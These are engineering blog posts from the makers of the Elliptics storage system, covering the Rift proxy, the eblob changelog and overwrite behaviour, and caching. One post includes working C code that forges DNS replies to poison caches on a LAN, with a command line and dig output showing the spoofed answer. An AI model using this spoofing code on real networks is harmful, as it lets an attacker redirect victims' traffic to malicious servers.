Reverbrain is a company we started to provide support and solutions for distributed storage and realtime computation problems.
We created a whole stack of technologies ranging from the lowest level of data storage up to a high-level processing pipeline.
Time moves on, and we see how complex it is to deal with massively increasing amounts of data. We provide solutions for true horizontal scaling with fair system complexity. Our storage appliances cover everything from hosting billions of small-to-medium objects up to huge data streaming systems.
Your data should not just lie archived in a distributed system – realtime pipeline processing is our vision of how data has to be handled. We use these technologies ourselves and want to provide the best experience for our customers.
I separated the elliptics HTTP proxy from our high-performance HTTP server framework TheVoid. TheVoid continues to be a framework for writing HTTP servers in C++, whilst Rift becomes the elliptics HTTP access point.
Rift supports the usual object upload/get/removal as well as upload/download flow control. The latter (soon to become the default and the only possible mode) is basically an arbiter which does not read more data from the client until the current chunk has been written. It uses chunked upload and download. Rift supports range requests (the Range: HTTP header).
There is basic authentication support in Rift. I will extend it to a per-bucket fashion similar to what Amazon S3 has (not the same API though). Rift also supports multiple-group caching, which is extremely useful for bigger content, when you suddenly decide that given objects have to be spread into more groups than those they were originally written into. There is 'a button' (basically a Python script) which copies given keys from their original groups into the caching groups and broadcasts updates to all Rift proxies by updating special keys which the proxies check periodically. Caching can be turned on and off on a per-key basis.
One can create special SSD caching groups, for example, and put the needed files there for some time. Or those can be commodity spinning disks for larger files like video content.
More details on this will follow on the documentation site.
Everything above, plus several new features, will be available both in Rift proxies and in the new cluster we are currently developing. Not that it will be plain Amazon S3, but something similar. More details later this year :)
Five years ago I stumbled upon a theoretical vulnerability in the DNS protocol found by Dan Kaminsky – given that one can guess the DNS query ID and source port, it is possible to send a properly crafted packet and inject a malicious DNS entry into the client's environment. Basically, the client would ask for the 'www.paypal.com' address and instead receive a reply pointing at a properly crafted hacker's server address.
ISC BIND – the most popular DNS server – claimed that it did not have that vulnerability. I love such things, so I spent a week or so developing software which could poison BIND's cache with malicious records. I succeeded and got a New York Times article as a reward. ISC BIND has fixed the issue since then – well, it is still possible to poison a remote DNS cache, but it requires more resources.
About resources – I created a distributed attack system, which contained multiple servers that turned on one after another if admins banned or turned off the current node. The next day I got fucked for running this crap in the office network. In the sandbox the attack required 1 Gb/s of free bandwidth to the DNS server and several minutes to succeed. People from Slashdot said that this attack is unfeasible in real life. Heh, I have seen a 110 Gb/s DDoS against our production systems, so 1 Gb/s is quite commodity today if you have several hundreds to thousands of dollars for the appropriate botnet.
But is it possible to craft such an attack more quietly? I thought it was.
Three days ago I found a DNSCurve article which claimed that DNS requests are actually sent via Ethernet broadcast in a LAN. My fault, I did not check this – it is actually wrong, at least I have not seen such networks. But if it were true, it would be quite an interesting attack vector to implement.
So, I spent three nights hacking up a tool to poison DNS caches in a LAN. It listens for DNS requests, matches the domain name against a regex and sends a properly crafted (but rather simple) poisoned reply back to the client.
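The interesting part is just assembling the answer. Below is a minimal sketch in C of how such a reply could be built from a captured raw query (this is not the actual dpoison source; the function name and buffer handling are illustrative assumptions):

#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <arpa/inet.h>

/* DNS header in RFC 1035 wire format */
struct dns_header {
	uint16_t id;
	uint16_t flags;
	uint16_t qdcount, ancount, nscount, arcount;
};

/*
 * Build a reply for a single-question A query.
 * query/qlen - raw DNS query as captured from the wire (header + question)
 * addr       - IPv4 address to inject, in network byte order
 * reply      - output buffer, at least qlen + 16 bytes
 * Returns the reply length.
 */
static size_t build_poisoned_reply(const uint8_t *query, size_t qlen,
		uint32_t addr, uint8_t *reply)
{
	struct dns_header *hdr;
	uint8_t *p;

	/* Start from the original query: same ID, same question section */
	memcpy(reply, query, qlen);
	hdr = (struct dns_header *)reply;

	/* Mark it as an authoritative answer, keep the client's RD bit */
	hdr->flags = htons(0x8400) | (hdr->flags & htons(0x0100));
	hdr->ancount = htons(1);
	hdr->nscount = 0;
	hdr->arcount = 0;

	/* Single answer record: compressed pointer to the question name
	 * (offset 12), TYPE A, CLASS IN, TTL 100, 4 bytes of address */
	p = reply + qlen;
	*p++ = 0xc0; *p++ = 0x0c;
	*p++ = 0x00; *p++ = 0x01;
	*p++ = 0x00; *p++ = 0x01;
	*p++ = 0x00; *p++ = 0x00; *p++ = 0x00; *p++ = 0x64;
	*p++ = 0x00; *p++ = 0x04;
	memcpy(p, &addr, 4);
	p += 4;

	return (size_t)(p - reply);
}

The reply is then sent back to the client's source address and port before the real answer arrives.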
Here is how it works:
$ sudo ./dpoison --device enp0s20u2u3 udp and dst port 53 --query ".*\.reverbrain\.com" --A "220.127.116.11"
$ dig @18.104.22.168 www.reverbrain.com
;; Warning: query response not set
; <<>> DiG 9.9.3-rl.13207.22-P2-RedHat-9.9.3-5.P2.fc19 <<>> @22.214.171.124 www.reverbrain.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22647
;; flags: rd ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available
;; QUESTION SECTION:
;www.reverbrain.com. IN A
;; ANSWER SECTION:
www.reverbrain.com. 100 IN A 126.96.36.199
;; Query time: 1 msec
;; SERVER: 188.8.131.52#53(184.108.40.206)
;; WHEN: Thu Nov 14 22:34:39 MSK 2013
;; MSG SIZE rcvd: 70
Too bad it does not work in real life. Or could it (over the air, perhaps)? :)
Eblob is the main low-level storage supported in elliptics. It was created as an append-only base, but eventually we added rewrite, data sorting, in-memory and on-disk indexes, added and then removed columns, bloom filters, iterators, blob merge, defragmentation and so on.
Eblob has rather simple interfaces accessible from C, C++ and Python.
So, we documented our most actively used low-level storage from every point of view: design and architecture, interfaces, known features, gotchas and best practices.
It is generally a good idea to read how things are done at the lowest level to understand how the whole system behaves, so here is the link to the eblob documentation: http://doc.reverbrain.com/eblob:eblob
I have just accepted a commit by Ruslan Nigmatullin which fixes a 31-bit integer overflow in the atomic counters used as transaction IDs.
This basically means that we have clients each of which has sent us more than 2 billion requests without a restart or disconnect – impressive clients!
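The idea behind the fix is trivial – make the counter wide enough. A tiny illustration (not the actual elliptics code) of a 64-bit atomic transaction ID counter that does not wrap after 2^31 requests:

#include <stdatomic.h>
#include <stdint.h>

/* A signed 32-bit counter overflows into negative IDs after roughly
 * 2.1 billion increments; a 64-bit atomic counter avoids that. */
static atomic_uint_fast64_t trans_id;

static uint64_t next_trans_id(void)
{
	return atomic_fetch_add(&trans_id, 1) + 1;
}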
So, Docker's repository supports storing its layered 'filesystem' in Elliptics, with its automagic recovery, replication into multiple datacenters (all around the world), scalability and so on.
Now you can safely distribute your VM images over Elliptics.
It describes how the cache is organized and how one can use it to speed up disk operations or just to store data in memory only.
Some non-trivial cases are also covered: how to organize the cache for append writes and partial updates, as well as various corner cases.
I removed the highest indirection level – the one where key indexes could live on separate servers – leaving only in-memory and on-disk indexes.
That is probably why the largest Elliptics storage by number of keys hosts only 50+ billion objects (counting all 3 copies though). And that is actually fewer than a hundred nodes (including all 3 replicas).
Hi, this is rbtz speaking again. I have been the engineer responsible for the eblob codebase for almost a year now. Here is a small recap of what has been happening with eblob since v0.17.2, with some commit highlights.
* Eblob now builds under Mac OS X. This improves the experience of developers with Macs.
* Changed most links to point to the newly created http://reverbrain.com.
* Added comments to all eblob subsystems: e254fc3. This eases the learning curve for new developers.
* Added l2hash support: c8fa62c. This reduces memory consumption of elliptics metadata by 25% on LP64.
* Added the first edition of the eblob stress test: 8eab8ed. A year later it is responsible for catching 99% of the bugs that would otherwise reach testing.
* Added config variables for index block and bloom: a106d9d. This allows sysadmins to limit the memory occupied by the bloom filter.
* Added a config variable to limit total blob size: f7da001. This allows sysadmins to limit eblob size when many databases are located on one shared drive.
* Reduced memory consumption of “unsorted” blobs by 20% on LP64: 19e8612.
* First static analyzer crusade (feat. clang static analyzer) – a number of “almost impossible to spot” bugs found.
* Added data-sort and binlog v1. This allows “on the fly” eblob defragmentation and memory cleanups.
* Added travis-ci tests after each commit: f08fea2.
* Removed the custom in-memory cache in favor of the OS page cache: a7e74a7. This removed a number of nasty races in eblob code and also opened the way for some future optimizations.
* Added a Doxyfile stub, so that in the future libeblob man pages may be autogenerated: aac9cb3.
* Decreased memory consumption of in-memory data structures by 10% on LP64: c6afffa.
* Replaced core mutexes with rwlocks. This improves our Intel VTune concurrency benchmarks, along with our QA tests.
* Second static analyzer crusade (feat. Coverity).
* Switched to adaptive mutexes (https://en.wikipedia.org/wiki/Spinlock#Alternatives) when available: 43b35d8.
* Sped up statistics update v1: 40a60d7. Do not hold the global lock while computing and writing stats to disk.
* Rewrote bloom filter v1: 6f08e07. This improves speed and reduces memory fragmentation.
* Allocate index blocks in one big chunk instead of millions of small ones, thus speeding up initialization and reducing memory fragmentation: b87e273.
* Do not hold the global lock for the whole duration of sync(): 6f6be68. This removes “stalls” in configs where sync > 0.
* Switched to POSIX.1-2008 + XSI extensions: 6ece045.
* Build with -Wextra and -Wall by default: 0e8c713. This should substantially improve code quality in the long term.
* Added options to build with hardening and sanitizers: c8b8a34, 2d8a42c. This improves our internal automated tests.
* Do not set bloom filter bits on start for removed entries: 36e7750. This improves lookup times for “long removed” but not yet defragmented entries.
* Added a separate thread for small periodic tasks: ea17fc0. In the future this can be upgraded to a simple background task manager.
* Moved statvfs(3) to the periodic thread, which speeds up write-only micro benchmarks by 50%: f36ab9d.
* Lock the database on init to prevent data corruption by simultaneous accesses to the same database by different processes: 5e5039d. See more about EB0000 in the kb article.
* Removed columns aka types: 6b1f173. This greatly simplifies the code and as a side effect improves elliptics memory usage and startup times.
* Removed compression: 35ac55f. This removes the dependency on the bsize knob for write alignment: 8d87b32.
* Rewrote stats v2: 94c85ec. Now stats updates are very lightweight and atomic.
* Added a writev(2)-like interface to eblob, so that the elliptics backend could implement very efficient metadata handling: b9e0391.
* Replaced the complex binlog with a very tiny binlog v2: 1dde6f3. This greatly simplifies the code and improves data-sort speed and memory efficiency.
* Made tests multithreaded: 1bd2f43. Now we can spot even more errors via automated tests before they hit staging.
* Moved to the GNU99 standard: f65955a. It is already 15 years old =)
* Fixed a very old bug with log message truncation/corruption on multithreaded workloads: 10b6d47.
* Bloom filter rewrite v2: 1bfadaf. Now we use many hash functions instead of one, trading CPU time for improved IO efficiency. This improved bloom filter efficiency by an order of magnitude (see the sketch after this list).
* Merge small blobs into one on defrag: ace7ca7. This improves eblob performance on databases with high record rotation by maintaining an almost fixed number of blobs.
* Added a record validity check on start: bcdb0be. See more about database corruption EB0001 in the kb article.
* More robust eblob_merge tool that can be used to recover corrupted blobs.
* Reduced memory consumption of in-memory data-structures by 10% on LP64: e851820;
* Added schedule-based data-sort: 2f457b8. More on this topic in a previous post: data-sort implications on eblob performance.
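For the curious, here is a generic sketch of the k-hash-function bloom filter idea behind the v2 rewrite mentioned above (this is not eblob's actual code, just an illustration): several independent hashes set and probe several bits, and a negative probe lets the reader skip the on-disk index lookup entirely.

#include <stdint.h>
#include <stddef.h>

#define BLOOM_BITS (1 << 20)	/* example filter size: 1 Mbit */
#define BLOOM_HASHES 4		/* number of hash functions (k) */

static uint8_t bloom[BLOOM_BITS / 8];

/* FNV-1a with a per-function seed stands in for k independent hashes */
static uint64_t bloom_hash(const void *key, size_t len, uint64_t seed)
{
	const uint8_t *p = key;
	uint64_t h = 14695981039346656037ULL ^ seed;
	size_t i;

	for (i = 0; i < len; ++i) {
		h ^= p[i];
		h *= 1099511628211ULL;
	}
	return h;
}

static void bloom_add(const void *key, size_t len)
{
	int i;

	for (i = 0; i < BLOOM_HASHES; ++i) {
		uint64_t bit = bloom_hash(key, len, i) % BLOOM_BITS;
		bloom[bit / 8] |= 1 << (bit % 8);
	}
}

/* Returns 0 if the key is definitely absent (index lookup can be skipped),
 * 1 if it may be present and the index has to be consulted. */
static int bloom_maybe_present(const void *key, size_t len)
{
	int i;

	for (i = 0; i < BLOOM_HASHES; ++i) {
		uint64_t bit = bloom_hash(key, len, i) % BLOOM_BITS;
		if (!(bloom[bit / 8] & (1 << (bit % 8))))
			return 0;
	}
	return 1;
}

More hash functions mean more CPU per lookup but a much lower false-positive rate, which is exactly the CPU-for-IO trade-off mentioned above.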
Here I have mentioned only the most notable commits, mostly performance and memory usage oriented changes. There is of course lots of other stuff going on, like bugfixes, minor usability improvements and some internal changes.
Here are some basic stats for this year:
Total commits: 1375
Stats total: 65 files changed, 8057 insertions(+), 4670 deletions(-)
Stats excl. docs, tests and ci: 39 files changed, 5368 insertions(+), 3782 deletions(-)
Also, if you are interested in what is going to happen in the eblob world in the near future, you should probably take a look at its roadmap.
By the way, for those of you who are interested in numbers and pretty graphs – after the recent upgrade of our internal elliptics cluster, storing billions of records, to the new LTS releases of elliptics 2.24.X and eblob 0.22.X, we got:
Response time reduction (log scale):
Disk IO (linear scale):
Memory (linear scale):
In this post I want to dig a little bit deeper into one of eblob's least understood parts: record overwrite. Let's start with the notion of how overwrite was meant to work in eblob: it simply shouldn't. Indeed, eblob started as an append-only database, so no overwrites were allowed. Then overwrite was added to reduce fragmentation for use cases where some records were continuously overwritten, so that appending them over and over again was inefficient. So a special case, “overwrite-in-place” for same-or-smaller size overwrites, was added. It was controllable via two knobs – a global per-database one called EBLOB_TRY_OVERWRITE and a per-write flag BLOB_DISK_CTL_OVERWRITE. Both of them are now deprecated; let me explain why.
From this point on eblob became what I call an “append-mostly” database, which means it usually only appends data to the end of a file, but in some rare cases it can overwrite data “in-place”.
During the binlog rewrite it was decided that having flags which drastically change eblob write behavior is too complicated, so those were replaced with one “canonical” write path: we try to overwrite a record in place only if the overwrite is of the same or smaller size and the blob is not currently under data-sort. So we basically enabled the EBLOB_TRY_OVERWRITE behavior by default, which should greatly reduce fragmentation on some workloads. There are possible performance implications of that decision, so we did a lot of testing via our benchmark system before applying this change.
As a side effect it allowed us to remove 90% of the binlog code, since there is no need to “log” data overwrites and keep track of their offsets in the original blob in order to apply them later to the sorted one.
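To make the resulting behavior concrete, here is a rough sketch of the write decision described above (the structures and names are hypothetical, this is not the actual eblob source):

#include <stdint.h>

struct write_request {
	uint64_t size;		/* size of the data being written */
};

struct existing_record {
	int found;		/* does the key already exist? */
	uint64_t disk_size;	/* space reserved for it on disk */
	int under_datasort;	/* is its blob currently being sorted? */
};

/* Returns 1 to overwrite in place, 0 to append to the open blob */
static int should_overwrite_in_place(const struct write_request *wr,
		const struct existing_record *old)
{
	/* No previous record: nothing to overwrite, so append */
	if (!old->found)
		return 0;

	/* New data must fit into the space already reserved on disk */
	if (wr->size > old->disk_size)
		return 0;

	/* Blob is being sorted: appending avoids having to log the
	 * in-place change and replay it against the sorted copy later */
	if (old->under_datasort)
		return 0;

	return 1;
}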
By the way, we considered three possible alternatives:
- Always append data to the end of the “opened” blob on overwrite. (A true append-only database)
- Overwrite in-place only in the last blob. (Almost append-only)
- Always overwrite in-place when the blob is not under data-sort. (An append-mostly database)
Here are some graphs from our benchmark system yandex-tank (Yay! It is open source).
10000 rps, 1kb records, eblob 0.21.16
Overwrite in last blob only:
We picked “always overwrite in-place” because it behaves really well with background data-sort – as you can see, there is almost no noticeable difference between the graph with data-sort in AUTO mode and the one with data-sort disabled. One common choice also simplifies the write path and makes performance independent of those knobs.
NB! Future eblob versions may change this behavior or reintroduce some of the knobs in case regressions of the “always overwrite” approach are found.
I made a new presentation at Fedora's Road to cloud tech conference.
It is all about safety – what problems can be found when developing and deploying distributed storage solutions, and how we solved them in Elliptics.
One can find an article (in Russian) for this presentation at http://ioremap.net/tmp/roadtocloud.txt